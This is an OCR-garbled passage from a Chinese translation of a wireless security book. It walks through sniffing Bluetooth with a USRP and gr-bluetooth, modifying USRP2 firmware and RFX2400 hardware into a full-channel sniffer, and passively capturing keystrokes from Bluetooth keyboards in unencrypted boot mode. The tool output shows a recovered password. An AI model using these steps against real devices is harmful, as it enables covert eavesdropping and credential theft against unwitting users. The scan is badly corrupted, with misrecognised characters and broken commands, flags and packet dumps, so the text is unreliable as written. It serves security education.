$ sudo mktun gr-bluetooth 

5 ifconfig RB 

gr—bluetooth Link encap:Ethernet HWaddr fe:6o66:f3:39:13:e0 


inet6 addr: fe80::fc66:f3ff:fe39:13e0/64 Scope:Link 
UP BROADCAST RUNNING MULTICAS MTIU:] OU Metric:l1 
RX packets:0 errors:0 dropped:0 coverruns:0 frame:0 
TX packets:0 errors:U dropped:4 overruns: 


Carrilier:0 


COLIisions:0 ee J300 
RX bytes:0 (0.0 B Tx bytes:0 {0.0 B) 


gr-bluetooth 接 口 创建 之 后 ， 使 用 类 似 tcpdump 这 样 的 工具 局 动 数 据 包 捕 获 进 程 。Debian Linux 的 用 己 可 以 使 用 命令 sudo 
apt-get install tcpdump 安 半 tcpdump。 工 具 安 妆 完毕 之 后 ， 局 动 ttpdump 进 程 ， 将 gr-bluetooth 接 口上 的 捕获 数据 仓储 到 文 
件 中 (gr-bluetooth-capture.dump) ， 如 下 所 示 : 
9 Sudo tcpdump =n ~s0 ~w gr-bluetooth-—capturedump -1 gr-bluetooth 
tcpdump: WARNING: gr-bluetooth: no IPv4 address assigned 
tcpdump: listening on gr-bluetooth, link-tvpe ENIOMB (Ethernet), capture 


在 另 一 个 终端 窗口 中 ， 表 次 运行 btrx 工 具 ， 使 用 -w 选 项 将 解密 完毕 的 监 牙 数据 包 信息 写 入 gr-bluetooth 接 口 : 


-ly 


3 SUdo btrx 一 L capture.cftile -1 244B.5M -—d 32 一 与 —W 

>>> gr fir ifi: using SSE 

lowest channel: 46, highest channel 41 

>>> gr fir CCC: USING SSE 

time 2510, channel 47, LAP ec4786 working on UAP/CLK1-— 
reduced rom 64 to 52 CLK1-6 candidates 


提示 ”如果 没有 USRP, 但 是 想 实践 术 书 中 这 个 例子 ， 你 可 以 从 http://www.hackingexposedwireless.com 网 站 上 将 它 下 载 到 


capture.cfile 文 件 。 


对 于 每 个 解密 的 蓝牙 数据 包 ，btrx 将 把 帧 的 内 容 写 入 到 gr-bluetooth 接 口中 。 因 为 我 们 在 接口 上 运行 着 tcpdump 工 具 ， 所 


以 所 有 解密 的 监 牙 帧 都 会 存储 在 gr-bluetooth-capture.dump 文 件 中 。 一 旦 btrx 工 具 完 成 了 对 capture.cfile 文 件 中 数据 的 处 理 ， 
那么 请 你 返回 到 tcpdump 窗 口 ， 通 过 按 Ctrl+C 键 停止 它 的 运行 。Tcpdump 会 报告 从 gr-bluetooth 接 口中 捕获 到 的 帧 的 数量 。 


尽管 标准 安 兴 的 Wireshark 可 以 打开 gr-bluetooth-capture.dump 文 件 ， 但 是 你 可 能 会 对 它 解 密 出 来 的 结果 感到 失望 。 在 我 
们 编写 本 书 的 时 候 ，Wireshark 无 法 对 gr-bluetooth 已 经 解密 的 数据 包 进 行 本 地 解密 。 笠 运 的 是 ，gr-bluetooth 的 开发 者 已 经 编 
写 了 一 系列 补丁 为 Wrieshark 增 加 这 个 功能 。 


要 让 Wireshark 包 含 gr-bluetooth 的 补丁 ， 需 要 确认 两 个 项 目的 源 代 码 : 


出 了 一 
5 Sudo su 


- cy f 3 f 一 
# cd /usr/src 


svn co http://anonsvn.wireshark.org/wireshark/trunk,/ wireshark 


# 家 
# svn co https://gr-bluetooth.svn.sourceforge.net/svnroot/gr-bluetooth 


Do (_ 


gr-bluetooth 
在 获得 了 两 个 项 目的 源 代码 之 后 ， 把 gr-bluetooth btbb 插 件 的 源 代 码 复制 到 wireshark/plugins 目 录 下 : 


# cp -rr gr-bluetooth/wireshark/plugins/btbb/ wireshark/plugins/ 


下 面 ， 给 Wireshark 打 上 gr-bluetooth 的 补丁 ， 使 btbb 插 件 生效 : 


# patch -P0O <gr-bluetooth/doc/wireshark-svn-btbb.patch 


patching file wireshark/configure.in 
patching file wireshark/Makefile.am 


patching file wireshark/packaging/nsis/Makefile.nmake 
patching file i 
patchindg file wireshark/plugins/Makefile. 


patching file wireshark/plugins/Makefile. = 


最 后 ， 切 换 到 wireshark 目 录 下 ， 配 置 、 编 译 、 安 半 Wireshark。 注 意 将 --prefix=/opt 参 数 传递 给 Wireshark 的 配置 脚本 ， 
这 样 它 就 会 安装 在 opt 的 顶级 目录 中 。 这 就 允许 你 使 用 完整 的 可 执行 文件 路 径 运 行 打 过 补丁 Wireshark， 同 时 在 系统 上 也 保留 了 
Linux 标 准 版 的 Wirshark : 


# . /autoogen.sh 

# ./configure -prefix=/opt 
# make 

# make install 


在 修改 版 的 Wireshark 安 六 完毕 之 后 ， 可 以 打开 gr-bluetooth 的 libcap 文 件 : 


# /opt/bin/wireshark -TI gr-bluetooth-capture.dump -—n 


在 Wireshark 解 密 视 图 中 ， 可 以 检查 指定 频率 中 解密 的 监 牙 帧 的 内 容 ， 如 下 图 所 示 。 


Fle Edt View Go Capture Analyze Statistics Telephony Jools Help 
如 加 加 基 回 国名 明生 纪 人 仿 于 旦 : 和 包 “ 


(| Filter: | v | Expression,,,| 4 Clear | & Apply 


No . | Time Source Destination Protocol |， Info RSSI 
I2 55.075732 OOOO: OU OO UUOY O00 295:6C 5 BUIJETOGT NUCL 
3 B5 675767 O080:00:00:00;:08 90:00:25:'ec:47:88 BLUetooth DM3y72-DH3 
14 85,075798 80:;900:00;00:00;09 80;00:25:8c:47:96 BLUBtooth NULL 
15 85 ,253994 00:06:05,00:08;08 80:65:;25;8c ;47:88 Bluetooth DM 
16 85,260925 00:00:00;090:80:;090 80;00:25:86c:47:86 Bluyetooth NULL 


I MC CTiCcAs mm, ,P,P RR, Fa OE, zr A liintasFl Rill 


as Mb A ML 
‘0661 1,., = TYPE; DM (Ox03) 
b Flags: x05, FLOW, SEQN 
HEC: Ox99 
™ Payload 
Payload Header 
.18 = LLID:; Start of an L2CAP message or no fragmentation (ACL-U} (9x82) 
= Flow: True 
B11 .= Length; 14 
b Bluetooth L2CaP Packet 
CRC: OxQQ0T 


6eoge 69 80 25 et 47 86 O06 00 86 66 80 80 1+ 18 38 80 io de 日 ， 

6 80 00 26 660619 区 9976 0 0 53 ef Od 2c x 

6620 6d 6 并 但 人 多 3 引信 0 上 

OO) Packet Header Flags (btbb .flags), 1 byte Packets:; 206 Displayed: 206 Ma,... = Profile: Default 


人 BR 制 区 牙 


使 用 未 经 修改 的 USRP， 攻 击 者 只 能 获取 到 有 限 的 蓝牙 网 络 数据 。 因 为 FHSS 的 存在 ， 攻 击 者 并 不 知道 跳 频 模式 ， 这 束 导 至 了 
他 无 法 将 穷 听 接口 和 极 微 网 的 跳 频 模式 进行 同步 。 在 一 个 特定 的 频率 上 进行 窃听 限制 了 攻击 者 能 够 获取 到 的 蓝牙 数据 ， 降 低 了 信 
息 港 露 的 威胁 。 如 果 攻 击 者 不 采取 任何 特别 措施 的 话 ， 使 用 蓝牙 的 79 个 信道 进行 通信 丈 能 够 防御 未 改 洲 USRP1 或 者 USRP2 穷 听 
器 。 


0 牙 分 析 和 攻击 工具 ， 它 能 够 捕获 和 解密 通信 数据 包 ， 将 解密 后 的 结果 导入 到 像 Wireshark 这 
样 灵 活 的 工具 中 进行 分 析 。 人 至 今 为 止 , 我 们 只 能 够 在 有 限 的 监 牙 信道 中 捕获 通信 数据 包 。 下 面 我 们 将 讲解 如 何 打 破 这 个 限制 ， 创 
造 一 个 全 信 章 的 蓝牙 宙 听 器 。 


克 ” 打造 全 信道 蓝牙 窃听 器 


为 了 有 效 地 使 用 蓝牙 穷 听 器 查看 和 分 析 极 微 网 通信 数据 包 ， 我 们 需要 对 所 有 的 79 个 信道 进行 通信 数据 包 捕获 。 如 果 想 区 分 
加 密 和 未 加 密 的 通信 数据 包 ， 只 在 个 别 信 道 进行 捕获 对 你 来 说 是 有 帮助 的 ， 但 是 如 果 你 的 目标 入 侵 蓝 牙 网 络 ， 那 么 它 是 远 远 不 够 
的 。 

从 硬件 角度 来 说 ,我们 的 限制 是 可 以 分 配 主 机 使 用 的 市 吝 忌 量 。 对 于 USRP1 来 说 ，USB 忆 线 的 最 大 市 芝 是 8Msps， 或 者 襄 
尼 的 无 线 频谱 是 8MHz。 对 于 USRP2， 它 及 用 一 个 干 兆 级 以 太 网 的 接口 将 数据 样本 友 送 到 主机 ， 但 是 它 的 市 吏 仍 然 被 限制 在 
25Msps， 或 者 说 它 的 无 线 频 谱 是 25MHz。 与 蓝牙 信 巴 及 用 的 市 宫 为 79M Hz 频谱 相 比 较 ， 蛙 个 USRP1 或 者 USRP2 都 无 法 捕获 所 
有 的 频谱 ， 如 下 图 所 示 。 


8 个 信 意 25 修 情 者 
USRP1 USRP2 


79 个 情思 
监 牙 频 庶 
幸运 的 是 ， 通 过 采用 一 种 名 为 人 为 混淆 的 技术 ， 我 们 可 以 对 USRP 2.4GHz 传 送 器 主板 进行 改装 ， 从 而 通过 单个 USRP2 也 能 
够 捕获 所 有 79 个 监 牙 信道 。 通 过 硬件 和 软件 的 过 滤器 组 合 ， 反 混淆 技术 被 应 用 在 数字 信号 处 理 过 程 中 ， 它 的 目的 是 去 除 所 指定 
频率 波段 外 的 干扰 信号 。 如 果 没 有 上 反 混 淆 扩 术 ， 那 么 所 需 RF 泡 围 外 的 信号 会 与 所 需 的 信号 混杂 在 一 起 ， 导 致 接收 器 无 法 对 所 需 


的 信号 进行 解密 。 


RFX2400 通 过 主 接收 器 接口 上 独立 的 反 混 淆 模拟 电路 实现 这 项 技术 。 在 USRP2 上 ， 在 模拟 数字 转换 器 (Analog to 
DigitalConverter，ADC) 转换 之 后 ，FPGA 固 件 同样 实现 了 第 二 个 反 混 消 过 滤器 ， 如 图 9-1 所 示 。 将 USRP2 调 整 到 最 低 的 采样 
率 (举例 来 说 ， 将 它 配 置 为 每 秒 接受 最 大 流量 的 样本 数据 ) ， 我 们 就 可 以 捕获 79M Hz 蓝牙 频谱 中 部 分 信道 的 数据 ， 如 图 9-2 所 
不 \。 


RFX2400 接 收回 主板 
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图 9-1 USRP2 FPGA 处 理 接收 路 径 
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图 9-2 ”蓝牙 流量 和 USRP2 接 收 范围 


grbluetooth 的 开 肥 者 想 要 设计 一 秋 全 信道 的 监 牙 穷 听 器 ， 这 样 他 们 融 得 出 了 一 个 似是而非 的 结论 : 可 以 及 用 人 为 混 消 来 
捕获 更 多 频谱 中 的 数据 ， 这 样 并 不 会 产生 什么 负面 的 结果 。 根 据 监 牙 调频 模式 的 特性 ， 单 个 极 微 网 在 任 一 时 | 间 、 任 一 区 域内 只 会 
在 同一 个 频率 中 进行 传输 。 因 此 目 然 地 对 信号 进行 混 清 束 可 以 让 gr-bluetooth 配 合 单个 USRP2 捕 获 所 有 的 蓝牙 频 谐 ， 如 图 9-3 所 


个 \。 


为 了 茶 用 反 混 消 ， 我 们 需要 修改 USRP RFX2400 的 接收 器 主板 ， 对 USPR2 FPGA 的 固件 进行 更 改 。 首 先 我 们 进 解 如 何 修改 
USRP2 的 FPGA 固 件 。 


Time 
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| 
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图 9-3 ”混淆 蓝牙 流量 和 USRP2 接 收 范围 


为 了 修改 FPGA 固 件 禁 用 反 混 淆 ， 我 们 需要 使 用 GNU Radio 的 us flash tool 对 USRP2 的 SD 卡 进行 升级 。 这 个 工具 并 没有 包 
含 在 GNU Radio 的 安 濠 包 中 ， 所 以 我 们 需要 下 载 usrp2 GNU Radio 工 程 : 


所 辣 
【1 
门 ， 
Te 
已 
| 
Ln 
月 
【1 


Sudo 3u 


EE + 让 


svn co http://gnuradio.org/svn/gnuradio/trunk/usrp2?2 gnuradio/usrp? 


接 下 来 ， 切 换 到 us flash tool 所 在 目录 ， 从 gr-bluetooth 网 站 下 载 修改 版 的 USRP2 FPGA 固 件 : 


# waqet https://gr-bluetooth.svn.sourceforge.net/svnroot/gr-bluetooth/bin 


/U2 LITEeV3 dlias.bin 
注意 ”GNU Radio 项 目 同 样 发 布 了 默认 的 USRP2 固 件 ， 它 的 网 址 是 http://gnuradio.org/releases/ustp2-bin/trunk。 如 果 想 将 
USRP2 恢 复 为 原始 状态 ， 你 可 以 参照 下 面 的 步骤 使 用 gnutadio.ofg 网 站 上 的 us_tev3.bin 文 件 。 


固件 下 载 完 后 ， 可 以 使 用 us flash tool 升 级 SD 卡 。 将 SD 卡 插 入 主机 中 (使 用 集成 插 槽 或 者 外 接 USB SD 读 卡 器 ) 。 请 检查 
dmesg 工 具 最 后 几 行 的 结果 来 确认 正确 的 设备 路 径 ， 然 后 使 用 u2 flash too| 将 两 个 固件 文件 写 入 SD 卡 中 。 


trimmed for brevity 
[i19871.626389] sd 35:0:0:0: [sdb|] Assuming drive cache: write through 
# ./u2 flash tool -dev=/dev/sdb -t fpga u2 rev3.bin -Ww 


注意 u2_flash_tool 将 文件 写 入 任何 你 所 指定 的 设备 中 。 如 果 不 小 心 指定 了 主机 上 的 文件 系统 ， 那 么 这 个 工具 会 对 数据 进行 
履 写 ， 可 能 会 造成 系统 无 法 启动 。 所 以 请 确保 指定 了 SD 卡 的 正确 设备 名 称 。 


在 这 些 命令 完成 之 后 ， 可 以 将 SD 卡 插 入 USRP 中 。 在 固件 成 功 更 新 后 ， 在 USRP2 局 动 时 6 个 LED 灯 都 会 内 煌 ， 之 后 其 中 的 两 


成 功 修改 元 USRP2 的 固件 之 后 ， 我 们 可 以 对 RFX2400 主 板 进 行 必要 的 改造 。 这 一 步 我 们 需要 拆 缀 表面 安 六 设备 (Surface 
mount Device，SMD) 的 6 个 电阻 和 4 个 电容 器 。 拆 由 完毕 之 后 ， 我 们 使 用 两 条 短 的 金属 续 来 连接 修改 过 的 电路 。 最 后 ， 我 们 
从 集成 电路 上 拆除 两 个 针脚 ， 让 它们 与 电路 板 断 开 连 接 。 


这 些 操作 并 不 是 十 分 困难 ， 但 是 在 处 理 细小 部 件 的 时 候 ， 我 们 一 定 要 做 到 平稳 。 在 这 个 过 程 中 ， 我 们 需要 多 种 常见 的 电工 工 


- 有 良好 烙铁 头 的 电 烙 铁 。 
:小 号 的 一 字 螺 丝 刀 ， 比 如 jeweler 系 列 中 的 一 种 或 者 那 种 用 来 修理 眼镜 的 。 
适合 在 电工 中 使 用 的 银子 。 
适合 电工 使 用 的 焊接 剂 (0.015 英 尺 的 焊接 剂 比 较 不 错 ) 。 
两 条 短 的 导线 ， 比 如 那些 用 在 实验 电路 板 电 路 上 的 。 
“ 图钉， 比如 那些 将 纸张 固定 在 软木 板 上 的 那 种 。 
: 针头 钳 。 


` 前 线 钳 。 


:万用表 或 者 通 断 测试 表 。 
. 放大 镜 (如 果 是 照明 放大 镜 那 就 更 好 了 ) 。 


注意 ”RFX2400 的 硬件 改装 操作 都 是 单 向 性 的 。 此 操作 对 于 大 部 分 用 户 来 说 都 是 很 困难 的 。 


my L) 


注意 ”如 果 你 之 前 从 来 没有 处 理 过 细小 的 电路 部 件 ， 那 么 在 尝试 下 面 这 些 步骤 之 前 ， 请 在 比 USRP RFX2400 传 输 器 廉价 的 电 


路 板 上 进行 练习 。 可 以 考虑 找 一 块 破 旧 的 电路 板 ， 在 上 面 练 习 拆 卸 外 设 ， 将 针脚 从 集成 电路 上 拔除 ， 然 后 在 回 到 USRP 上 进行 


践 。 


人 们 开发 了 多 种 技术 来 拆 乞 表 面 安 闭 设备 。 根 据 作 者 的 经 验 ， 最 简单 的 方法 是 用 义 子 夹 住 设备 ， 从 上 往 下 施加 压力 ， 对 焊 点 
进行 加 热 ， 一 闯 融 会 从 电路 板 上 断 开 连接 。 如 果 遇 到 一 个 安 委 很 牢固 的 SMD， 没 有 办 法 很 容易 拆卸 的 话 ， 可 以 将 螺丝 刀 放 在 
SMD 末 端的 附近 ， 使 用 电 烙 铁 加 热 焊接 剂 直到 能 够 将 末端 从 焊 盘 上 所 起 ， 然 后 换 用 角 子 将 SMD 拔 起 ， 继 续 加 热 其 他 的 焊 点 直到 
能 够 让 它 完全 与 主板 脱离 。 


注意 ”在 进行 这 些 改装 的 时 候 ， 记 住 USRP 传 输 器 主板 的 保修 就 失效 了 。 


将 R5、R6、R7、R8、R61 以 及 R87 位 置 的 电阻 移 除 。 下 面 移 除 C85、C87、C89 和 C91 处 的 电容 器 。 
AD8347 解 调 器 集成 电路 附近 ， 如 图 9-4 所 示 (需要 移 除 的 电阻 和 电容 器 作者 都 使 用 方 框 标 示 出 来 了 ) 。 


这 些 位 置 都 位 于 


移 除 完 电阻 和 电容 器 之 后 ， 我 们 就 可 以 把 AD8347 解 调 器 集成 电路 上 的 两 个 针脚 拆除 。 我 们 必须 将 编号 为 18 和 20 的 针脚 与 电 
这 一 步 我 们 需要 创造 一 个 小 工具 ， 它 的 名 称 叫做 针脚 移 除 器 。 


路 板 之 间 的 连接 拆除 ， 使 用 的 扩 术 叫做 针脚 移 除 。 
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图 9-4 需要 移 除 的 电阻 和 电容 器 位 置 


使 用 针头 钳 将 图 钉 头 部 的 一 小 部 分 他 曲 大 约 90 硫 ， 健 曲 部 分 的 长 度 越 短 越 好 。 这 样 残 形成 了 一 个 笛 小 的 “钩子 ”， 如 图 9-? 
所 示 。 可 以 使 用 一 把 小 的 雏 刀 对 钩子 进行 修整 ， 缩 短 它 的 宽度 ， 这 样 它 束 能 更 轻易 地 插入 那些 很 窗 的 地 方 。 


图 9-5 ”用 软木 板 图 箱 做 成 的 针脚 移 除 器 


将 针脚 移 除 器 插入 17 号 和 18 号 针脚 之 间 的 空 除 ， 转 动 它 直 到 钩子 部 分 处 于 18 号 针脚 的 下 方 ， 如 图 9-6 所 示 。 如 果 钩 子 部 分 过 
长 的 话 ， 可 以 用 雏 刀 去 除 它 的 末端 ， 或 者 旋转 一 个 角度 。 从 上 方 施加 适当 的 压力 ， 加 热 18 号 针脚 的 末端 直到 焊接 剂 融 化 ， 这 样 
就 能 将 针脚 从 主板 上 拔除 了 。 对 于 20 号 针脚 重复 上 述 步骤 (在 图 9-6 中 作者 标示 出 了 18 号 和 20 号 针脚 。 靠 集成 电路 黑 点 最 近 的 是 
1 号 针脚 ， 其 他 的 针脚 以 此 类 推 ) 。 


注意 ”在 拔除 针脚 的 时 候 ， 很 有 可 能 会 破坏 焊 盘 的 位 置 。 只 要 针脚 还 与 阻 焊 层 保持 接触 ， 那 么 这 就 不 会 产生 问题 。 


图 9-6 ”针脚 移 除 器 插 在 了 18 号 针脚 下 方 


在 将 针脚 从 主板 拔 出 乙 后 ， 我 们 需要 安 委 两 条 跳 接线 来 重新 连接 电路 部 件 。 准 备 两 根 导 线 ， 它 们 的 长 度 大 概 是 1/2 英 十 和 
1/16 贡 寸 。 将 短 的 那 根 导 绪 的 保护 层 剥 除 ， 长 的 那 根 需要 保留 。 


我 们 使 用 长 的 那 根 导 线 穿 过 R7 焊 垫 ， 在 AD8347 的 6 号 针脚 和 8 号 针脚 之 间 建 立 连 接 。 在 电路 上 AD8347 的 标签 是 自然 对 齐 
的 ， 将 导线 的 一 端 焊 接 在 R7 最 底部 的 焊 盘 上 ， 另 一 端 则 焊接 在 R61 最 右边 的 焊 盘 上 。 下 面 用 较 短 的 那 根 导 线 连接 R8 和 R87 最 底部 
的 焊 盘 。 


在 使 用 两 根 导 续 完 成 跳 线 乙 后 ， 最 终 的 成 品 看 起 来 应 该 与 图 9- 7 相似 。 


图 9-7 改装 完毕 的 RFX2400 


注意 ”可 以 在 本 书 的 配套 网 站 上 找到 高 分 辨 率 的 RFX2400 修 改 照 片 。 


使 用 你 的 通 断 测试 表 确 保 AD8347 的 18 号 和 20 号 针脚 脱离 了 原来 的 焊 盘 位 置 。 同 样 确认 6 号 和 8 号 针脚 以 及 22 号 和 24 号 针脚 
之 间 的 连通 性 。 


在 全 部 测试 完毕 之 后 ， 残 拥有 了 一 个 全 信道 蓝牙 穷 听 器 。 在 随后 对 于 蓝牙 键盘 的 讨论 中 ， 会 看 到 我 们 会 如 何 很 好 地 使 用 它 。 


使 用 改 沪 过 的 USRP2， 攻 击 者 能 够 无 视 FHSS 安 全 机 制 ， 捕 获 蓝 牙 极 微 网 中 的 全 部 数据 。 尽 管 改 涂 操 作 起 来 十 分 复杂 ， 但 它 
给 予 了 攻击 者 捕获 和 访问 蓝牙 数据 的 可 能 性 ， 而 且 他 们 事先 并 不 需要 了 解 监 牙 的 组 网 万 式 。 


攻击 者 对 蓝牙 极 微 网 进行 窃听 的 难 易 度 取决 于 通信 数据 包 交 换 的 方式 以 及 加 密 万 式 。 要 限制 敏感 信息 通过 蓝牙 泄露 出 去 ， 可 
以 使 用 所 有 可 行 的 加 密 手段 ， 包 括 一 些 上 层 的 程序 加 密 特 性 。 
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仪 次 于 监 牙 耳 机 ， 监 牙 键 盘 和 妃 标 中 监 牙 技术 也 得 到 了 很 广泛 的 应 用 。 与 蓝牙 耳机 27M Hz 的 频谱 相 比 ， 监 牙 和 键盘 覆盖 的 频 
谱 更 广 一 些 ， 拥 有 更 高 的 可 靠 性 ， 用 生 闫 商 的 话 来 说 ， 通 过 “工业 标准 的 加 密 ” 实 现 了 更 好 的 安全 性 
(http://tinyurl.com/nj3f2d， 第 6 页 ) 。 


乍 一 看 ， 蓝 牙 技术 似乎 很 适合 在 无 线 键盘 中 采用 。 它 能 够 提供 加 密 和 认证 服务 ， 对 外 部 计算 设备 提供 很 高 的 安全 性 ， 防 范 类 
似 无 线 监 牙 键 盘 记 录 这 样 普遍 的 攻击 手段 。 监 牙 人 机 接口 设备 (Human lnterface Device，HID) 规 沁 对 于 键盘 设备 的 敏感 性 
定义 了 一 组 特别 的 安全 措施 : 


蓝牙 安全 措施 ， 比 如 认证 、 绑 定 和 加 密 能 够 应 用 在 所 有 的 蓝牙 HID 中 ， 但 是 不 包括 键盘 、 袖 珍 键盘 以 及 其 他 传输 生物 或 者 身 
份 标识 信息 的 设备 。 同 样 那些 与 蓝牙 键盘 或 者 袖珍 键盘 交互 敏感 信息 的 主机 也 需要 请 求 一 个 安全 的 连接 。 这 样 就 确保 了 用 户 不 会 
杭 混 蓝牙 键盘 的 安全 可 用 性 ， 同 时 也 为 市 面 上 的 蓝牙 键盘 提供 了 增值 的 安全 特性 。 


除了 HID 规 范 中 定义 的 安全 措施 外 ， 蓝 牙 键盘 技术 并 不 像 你 想象 的 那么 人 简单。 举例 来 蜗 ， 假 设 客户 需要 在 系统 启动 之 前 使 用 
键盘 来 访问 PC 上 的 BIOS 设 是。 蓝牙 HID 规 学 中 明确 定义 了 需要 由 主机 初始 化 安全 设 定 ， 这 样 在 主机 的 操作 系统 启动 之 前 它 对 监 
牙 并 不 提供 任何 支持 ， 同 样 BIOS 也 不 包括 蓝牙 主机 堆栈 的 功能 。 


为 了 满足 这 样 的 要 求 ， 蓝 牙 HID 规 学 定义 了 一 个 实用 的 输入 模式 : 局 动 模式 。 在 局 动 模式 中 ， 赣 牙 接口 将 目 身 模拟 成 简单 的 
USB HID 设 备 ， 在 无 线 键盘 和 主机 接口 之 间 创 建 了 一 个 不 加 密 的 链接 。 通 过 这 样 的 模拟 ， 即 使 是 像 BIOS 这 样 最 基本 的 接口 也 能 
够 提供 对 蓝牙 键盘 输入 的 支持 ， 因 为 它 将 设备 识别 为 一 个 USB 键 盘 的 输入 。 


许多 蓝牙 产品 都 支持 启动 模式 这 个 功能 ， 为 终端 用 户 使 用 蓝牙 键盘 提供 了 一 个 简单 的 接口 。 举 例 来 说 ， 市 面 上 常见 的 
Logitech (罗技 ) MX5000 蓝 牙 键盘 和 鼠标 系列 在 用 户 手 册 中 描述 了 一 种 名 为 快速 配对 (Quick Pairing) 的 特性 。 产 品 文档 指 
导 用 户 将 产品 中 内 含 监 牙 USB 适 配器 插入 主机 系统 ， 如 上 图 所 示 ， 关 闭 弹 出 的 Add New Hardware (增加 新 设备 ) 向 导 ， 按 压 


适配器 上 的 按钮 直到 LED 指 示 灯 闪 煌 。 在 蓝牙 USB 适 配器 指示 灯 闪 炸 的 时 候 ， 按 下 键盘 和 由 标 产品 上 的 小 按钮 完成 启动 模式 配对 


人 们 通常 使 用 蓝牙 键盘 在 蓝牙 HID 启 动 模 式 中 对 系统 进行 配置 。 通 过 产品 的 说 明 书 ( 残 像 前 面 所 摘 述 的 罗技 MX5000 采 用 的 
快速 配对 模式 ) 或 者 直接 进行 设备 配置 ， 蓝 牙 键盘 用 尸 很 少 会 及 用 完整 的 蓝牙 HID 模 式 (支持 加 密 和 设备 认证 ) ,这样 他 们 的 按 
键 记 录 很 容易 受到 被 动 历 听 的 攻击 。 


使 用 全 信道 写 听 器 ， 攻 击 者 很 容易 束 能 够 捕获 区 域内 的 赣 牙 数据 ， 将 按键 记录 转换 为 明文 ， 创 造 一 个 被 动 的 远程 键盘 记录 
器 。 首 先 ， 你 需要 处 于 目标 系统 附近 ， 使 用 修改 过 FPGA 固 件 的 USRP2 和 RFX2400 将 数据 保存 到 文件 中 : 


Ss sudo usrp?2 rx cfile.py -3 -f 2440M -G 50 -QQ 4 -N 500M btkeyboard.sfile 


在 本 例 中 ， 使 用 usrp2_rx_cfile.py 工 具 将 USRP2 捕 获 的 数据 保存 到 btkeyboard.sfile 中 ， 参 数 为 2440M Hz、 增 益 50dB、 采 
样 数据 为 5000 万 个 。 采 样 率 设置 为 4， 这 样 主机 接收 率 束 是 25Msps。-s 参 数 表示 用 16 位 数值 表示 捕获 的 数据 ， 以 此 减 小 捕获 文 
件 的 大 小 ， 减 少 随后 btrx 工 具 的 运行 时 间 。 


注意 ”本 例 所 示 的 ustp2_rx_cfile.py 命 令 会 占用 许多 系统 资源 。 采 样 率 为 4 表示 主机 接收 率 为 25Msps， 每 个 样本 由 两 个 16 位 数 
值 表 示 ， 这 样 需要 写 到 磁盘 上 的 数据 文件 大 小 就 有 800Mbps。 你 不 仅 需 要 一 个 可 以 支持 超过 800Mbps 的 千 兆 级 以 太 网 卡 ， 除 此 之 
外 还 需要 一 块 读 写 速 度 很 快 的 硬盘 。 如 果 拥 有 很 大 的 RAM， 但 是 缺少 一 块 快速 硬盘 ， 那 么 在 使 用 USRP2 捕 获 数 据 时 ， 你 可 以 考虑 
使 用 tmpfs ramdisk 作 为 临时 存储 器 。Ubuntu 系 统 在 /var/run 下 上 默认 使 用 ramdisk， 它 会 占用 一 半 的 系统 内 存 。 
在 usrp2_rx_cfile.py 工 具 捕 获 键盘 数据 时 ， 我 们 可 以 创建 gr-bluetooth 接 口 ， 使 用 tcpdump 解 密 数 据 包 的 内 容 : 
$ sudo mktun gr-bluetooth 
$ sudo tcpdump -mi gr-bluetooth -ss0 ~—w btkeyboard.dump 
tcpdump: WARNING: gr-bluetooth: no IPv4 address assigned 


tcpdump: listening on gr-bluetooth, link-type ENIOMB (Ethernet}, capture 


3lze 62I235 bytes 
在 男 一 个 窗口 中 ， 我 们 可 以 使 用 btrx.py 解 密 原始 的 捕获 文件 ， 将 捕获 到 的 监 牙 数据 包 写 入 gr-bluetooth 虚 拟 接口 中 : 
$s sudo btrx.py -3 -3 -a -Ww -2 -d 4 -ft 2440M -i btkeyboard.sfile 
注意 ”2440MHz 是 蓝牙 频率 (79MHz) 的 中 间 点 ， 配 合 改装 过 的 USRP2， 我 们 设置 这 个 参数 来 捕获 所 有 的 蓝牙 数据 。 


在 btrx.py 处 理 完 所 有 btkeyboard.sfile 中 的 数据 后 ， 我 们 返回 到 tcpdump 会 话 中 ， 通 过 按 Ctrl+C 键 停止 穷 听 器 。 使 用 市 


BTBB 插 件 的 Wireshark 查 看 捕获 到 的 数据 内 容 。 首 先 我 们 启动 Wireshark 穷 听 器 : 


ls 


$s$ /opt/bin/wireshark -—n -r btkeyboard.dump 


加 载 Wireshark 后 ， 我 们 使 用 显示 过 滤器 btl2cap， 限 制 显示 L2CAP 的 数据 ， 如 下 图 所 示 。 切 换 到 Bluetooth L2CAP 
Packet (蓝牙 L2CAP 数 据 包 ) 标签 ， 展 开 Command (命令 ) 块 ， 我 们 可 以 看 到 345 号 帧 中 包含 PSM HID_ CONTROL 类 型 的 连 
接 请 求 ， 表 明 这 是 一 个 监 牙 HID 连 接 。 


监 牙 局 动 模式 连接 中 传送 的 击 键 记 录 都 是 USB HID 扫 摘 码 (不 是 ASCII 码 数据 ) 。Wireshark 并 不 会 为 我 们 解密 这 些 数据 ， 
但 是 我 们 可 以 使 用 本 书 配套 网 站 上 的 btaptap 工 具 来 获取 键盘 的 击 键 记录 。 


Fle Edit View Go Capture Analyze Statistics Telephony Tools Help 


S| 四 | 区 3 旦 | 目 国 @& e 
pa ; i = 一 号 hy 中 = = = 和 


(Filter btl2cap v | dp Expression,,, 4 Clear | Applv 
Ne, 。 | Time Source Destination Protocol | Into RSSI 
354 109,.560458 G6:00:80:006:00068 80:07:61:48:31:dd L2cAP Revd Connection Request 
369 119.446526 的 :60:00:09:00 的 80:;07:;61:;48:31:;dd L2cAP Revd Connection Response 
A428 116.867344 O90:00:090:00:00:00 800:07:86]1 :#48:31:gd L2cAP Revyd configure Response 
A452 120.3478]3 00:;900:;00;00:090:680 80;07:81 :48:;31:dd L2cAP Revd Connection Requast 
A454 1206.566133 0:00:00:00:00:08 80;:07:861 :48:31:dg Lz2cAP Revd connection Response a 


™ LUSLOULI Lowmy Lm,clL 
Length; 8 
CID; Ox800] 
ww Command: Connection Request 
Command Code: Connection Regquest (Gx92) 
Command Identitier: Gx91 
Command Length: 4 
PSM: HID CONTROL (Gx6011) 
Source CID: OxQ06e 
CRC: Oxedsd 


6699 6 809761 4d000 0 ff ton oo i i 


019 69 890 32 92 19 83 15 66 868 060 6006002 64 00 SN 
S02 IF 冯 0 ed 和 
kJ) ProtocoliService Multiplexer (btl2cap.psm), 2 bytes Packets; 928 Displayed: 28 Mar,,, = Profile; Default 


$s ./btaptap 
Must 0 a libpcap tilename. 
Usage: btaptap |[-r pcapfile.pcap| [-c count]|] [hl 


» ./btaptap -TI ../keystrokes.pcap 
qwertyl23 


